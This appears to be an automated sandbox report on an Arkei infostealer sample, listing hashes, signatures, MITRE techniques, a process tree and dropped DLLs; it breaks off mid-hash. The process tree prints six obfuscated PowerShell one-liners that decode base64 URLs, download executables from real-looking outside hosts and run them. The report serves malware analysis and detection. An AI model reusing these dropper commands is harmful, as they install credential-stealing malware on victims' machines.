arkei | 05c1db899e9fa8d5680ae0d7b235b1d9f0c8d70622dacca16dab257a18662137

Analysis

max time kernel
130s
max time network
168s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
27-05-2022 16:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

05c1db899e9fa8d5680ae0d7b235b1d9f0c8d70622dacca16dab257a18662137.exe
Size

65KB
MD5

eb15e7dcfca71d24302f712f93df60ad
SHA1

48515c1ec1feaf5c6d8cee57144b4c4ef32c8e8d
SHA256

05c1db899e9fa8d5680ae0d7b235b1d9f0c8d70622dacca16dab257a18662137
SHA512

2da3d0b0540ea50e043b83da91044da49822ef0dad416b29195ad221fd236b98a1195253eac61112c2a69dcfe2e00059ca0e6655713d02eaff5989c76f32dda1

Score

10^/10

arkei default stealer suricata upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://bit.do/e5K4M

exe.dropper

http://bit.do/e5K4M

Extracted

Family

arkei

Botnet

Default

Signatures

Arkei
Arkei is an infostealer written in C++.
stealer arkei
suricata: ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4
suricata: ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4
suricata

Blocklisted process makes network request 5 IoCs

flow	pid	Process
8	1600	powershell.exe
9	3188	powershell.exe
10	1272	powershell.exe
11	3300	powershell.exe
13	3300	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
3540	gen.exe
1864	bve.exe
1564	jdz.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0006000000023155-134.dat	upx
behavioral2/files/0x0006000000023155-133.dat	upx
behavioral2/memory/3540-135-0x0000000000400000-0x0000000000418000-memory.dmp	upx

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	bve.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	jdz.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	gen.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	mshta.exe

Loads dropped DLL 2 IoCs

pid	Process
4908	MSBuild.exe
4908	MSBuild.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1564 set thread context of 4908	1564	jdz.exe	110
PID 1864 set thread context of 4980	1864	bve.exe	114

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
3960	4980	WerFault.exe	114
2104	4908	WerFault.exe	110

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
3484	powershell.exe
3500	powershell.exe
3188	powershell.exe
1272	powershell.exe
1600	powershell.exe
3300	powershell.exe
3484	powershell.exe
1272	powershell.exe
3188	powershell.exe
3300	powershell.exe
1600	powershell.exe
3500	powershell.exe
1564	jdz.exe
1564	jdz.exe
1864	bve.exe
1864	bve.exe
1864	bve.exe
1864	bve.exe
1864	bve.exe
1864	bve.exe
1864	bve.exe
1864	bve.exe
1864	bve.exe
1864	bve.exe
1864	bve.exe
1864	bve.exe
1864	bve.exe
1864	bve.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	1272	powershell.exe
Token: SeDebugPrivilege	1600	powershell.exe
Token: SeDebugPrivilege	3300	powershell.exe
Token: SeDebugPrivilege	3484	powershell.exe
Token: SeDebugPrivilege	3188	powershell.exe
Token: SeDebugPrivilege	3500	powershell.exe
Token: SeDebugPrivilege	1564	jdz.exe
Token: SeDebugPrivilege	1864	bve.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1496 wrote to memory of 716	1496	05c1db899e9fa8d5680ae0d7b235b1d9f0c8d70622dacca16dab257a18662137.exe	78
PID 1496 wrote to memory of 716	1496	05c1db899e9fa8d5680ae0d7b235b1d9f0c8d70622dacca16dab257a18662137.exe	78
PID 1496 wrote to memory of 716	1496	05c1db899e9fa8d5680ae0d7b235b1d9f0c8d70622dacca16dab257a18662137.exe	78
PID 716 wrote to memory of 3540	716	cmd.exe	79
PID 716 wrote to memory of 3540	716	cmd.exe	79
PID 716 wrote to memory of 3540	716	cmd.exe	79
PID 3540 wrote to memory of 2304	3540	gen.exe	80
PID 3540 wrote to memory of 2304	3540	gen.exe	80
PID 3540 wrote to memory of 2304	3540	gen.exe	80
PID 2304 wrote to memory of 4064	2304	cmd.exe	83
PID 2304 wrote to memory of 4064	2304	cmd.exe	83
PID 2304 wrote to memory of 4064	2304	cmd.exe	83
PID 2304 wrote to memory of 1852	2304	cmd.exe	84
PID 2304 wrote to memory of 1852	2304	cmd.exe	84
PID 2304 wrote to memory of 1852	2304	cmd.exe	84
PID 2304 wrote to memory of 2868	2304	cmd.exe	85
PID 2304 wrote to memory of 2868	2304	cmd.exe	85
PID 2304 wrote to memory of 2868	2304	cmd.exe	85
PID 2304 wrote to memory of 1900	2304	cmd.exe	86
PID 2304 wrote to memory of 1900	2304	cmd.exe	86
PID 2304 wrote to memory of 1900	2304	cmd.exe	86
PID 2304 wrote to memory of 2752	2304	cmd.exe	87
PID 2304 wrote to memory of 2752	2304	cmd.exe	87
PID 2304 wrote to memory of 2752	2304	cmd.exe	87
PID 2868 wrote to memory of 1272	2868	mshta.exe	90
PID 2868 wrote to memory of 1272	2868	mshta.exe	90
PID 2868 wrote to memory of 1272	2868	mshta.exe	90
PID 4064 wrote to memory of 3188	4064	mshta.exe	88
PID 4064 wrote to memory of 3188	4064	mshta.exe	88
PID 4064 wrote to memory of 3188	4064	mshta.exe	88
PID 1852 wrote to memory of 3500	1852	mshta.exe	89
PID 1852 wrote to memory of 3500	1852	mshta.exe	89
PID 1852 wrote to memory of 3500	1852	mshta.exe	89
PID 1900 wrote to memory of 3484	1900	mshta.exe	95
PID 1900 wrote to memory of 3484	1900	mshta.exe	95
PID 1900 wrote to memory of 3484	1900	mshta.exe	95
PID 2304 wrote to memory of 2652	2304	cmd.exe	94
PID 2304 wrote to memory of 2652	2304	cmd.exe	94
PID 2304 wrote to memory of 2652	2304	cmd.exe	94
PID 2752 wrote to memory of 3300	2752	mshta.exe	97
PID 2752 wrote to memory of 3300	2752	mshta.exe	97
PID 2752 wrote to memory of 3300	2752	mshta.exe	97
PID 2652 wrote to memory of 1600	2652	mshta.exe	99
PID 2652 wrote to memory of 1600	2652	mshta.exe	99
PID 2652 wrote to memory of 1600	2652	mshta.exe	99
PID 3300 wrote to memory of 1864	3300	powershell.exe	102
PID 3300 wrote to memory of 1864	3300	powershell.exe	102
PID 3300 wrote to memory of 1864	3300	powershell.exe	102
PID 1600 wrote to memory of 1564	1600	powershell.exe	101
PID 1600 wrote to memory of 1564	1600	powershell.exe	101
PID 1600 wrote to memory of 1564	1600	powershell.exe	101
PID 1564 wrote to memory of 4908	1564	jdz.exe	110
PID 1564 wrote to memory of 4908	1564	jdz.exe	110
PID 1564 wrote to memory of 4908	1564	jdz.exe	110
PID 1564 wrote to memory of 4908	1564	jdz.exe	110
PID 1564 wrote to memory of 4908	1564	jdz.exe	110
PID 1564 wrote to memory of 4908	1564	jdz.exe	110
PID 1564 wrote to memory of 4908	1564	jdz.exe	110
PID 1564 wrote to memory of 4908	1564	jdz.exe	110
PID 1564 wrote to memory of 4908	1564	jdz.exe	110
PID 1564 wrote to memory of 4908	1564	jdz.exe	110
PID 1864 wrote to memory of 4920	1864	bve.exe	111
PID 1864 wrote to memory of 4920	1864	bve.exe	111
PID 1864 wrote to memory of 4920	1864	bve.exe	111

C:\Users\Admin\AppData\Local\Temp\05c1db899e9fa8d5680ae0d7b235b1d9f0c8d70622dacca16dab257a18662137.exe
"C:\Users\Admin\AppData\Local\Temp\05c1db899e9fa8d5680ae0d7b235b1d9f0c8d70622dacca16dab257a18662137.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1496
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9F04.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\05c1db899e9fa8d5680ae0d7b235b1d9f0c8d70622dacca16dab257a18662137.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:716
- - C:\Users\Admin\AppData\Local\Temp\gen.exe
    gen.exe
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:3540
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9FB0.tmp\start2.bat" C:\Users\Admin\AppData\Local\Temp\gen.exe"
      4⤵
      Checks computer location settings
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:2304
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\9FB0.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4064
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ufnxmjsqb $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ufnxmjsqb mwsfev $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|mwsfev;ufnxmjsqb zwncmhjoglapft $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs0TQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);zwncmhjoglapft $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3188
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\9FB0.tmp\b1a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:1852
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xksqtuiezpom $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xksqtuiezpom najxgsmhtuwd $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|najxgsmhtuwd;xksqtuiezpom lubwzta $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2tmZGhzYS5ydS9hc2RmZy5leGU=';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);lubwzta $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3500
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\9FB0.tmp\b2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:2868
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL luhqmxbnvrt $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;luhqmxbnvrt pkzotxjl $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pkzotxjl;luhqmxbnvrt aiykpt $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs1aQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);aiykpt $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1272
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\9FB0.tmp\b2a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:1900
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL qjezygpm $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;qjezygpm tykqrhcaxivo $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|tykqrhcaxivo;qjezygpm yqvjfrouc $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JyYXRpb3AucnUvYXNkZmcuZXhl';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);yqvjfrouc $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3484
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\9FB0.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:2752
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL fwygvqhixbak $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;fwygvqhixbak rwfxnse $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rwfxnse;fwygvqhixbak vdgyxptwz $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs0Yg==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);vdgyxptwz $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3300
        
        C:\Users\Public\bve.exe
        
        "C:\Users\Public\bve.exe"
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1864
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        8⤵
        
        PID:4920
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        8⤵
        
        PID:4944
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        8⤵
        
        PID:4964
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        8⤵
        
        PID:4980
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 1288
        9⤵
        Program crash
        
        PID:3960
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\9FB0.tmp\m1a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:2652
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xrfhvszbucp $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xrfhvszbucp qtpbfnvsjwme $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|qtpbfnvsjwme;xrfhvszbucp pedzf $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL25pY29zbGFnLnJ1L2FzZGZnLmV4ZQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);pedzf $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1600
        
        C:\Users\Public\jdz.exe
        
        "C:\Users\Public\jdz.exe"
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1564
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        8⤵
        Loads dropped DLL
        
        PID:4908
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 816
        9⤵
        Program crash
        
        PID:2104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4908 -ip 4908
1⤵
PID:2028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4980 -ip 4980
1⤵
PID:2752

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\freebl3.dll

Filesize
326KB

MD5
ef2834ac4ee7d6724f255beaf527e635

SHA1
5be8c1e73a21b49f353c2ecfa4108e43a883cb7b

SHA256
a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba

SHA512
c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2

Download Submit
C:\ProgramData\mozglue.dll

Filesize
133KB

MD5
8f73c08a9660691143661bf7332c3c27

SHA1
37fa65dd737c50fda710fdbde89e51374d0c204a

SHA256
3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

SHA512
0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

Download Submit
C:\ProgramData\mozglue.dll

Filesize
133KB

MD5
8f73c08a9660691143661bf7332c3c27

SHA1
37fa65dd737c50fda710fdbde89e51374d0c204a

SHA256
3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

SHA512
0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

Download Submit
C:\ProgramData\nss3.dll

Filesize
1.2MB

MD5
bfac4e3c5908856ba17d41edcd455a51

SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428

SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

SHA512
2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

Download Submit
C:\ProgramData\nss3.dll

Filesize
1.2MB

MD5
bfac4e3c5908856ba17d41edcd455a51

SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428

SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

SHA512
2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

Download Submit
C:\ProgramData\softokn3.dll

Filesize
141KB

MD5
a2ee53de9167bf0d6c019303b7ca84e5

SHA1
2a3c737fa1157e8483815e98b666408a18c0db42

SHA256
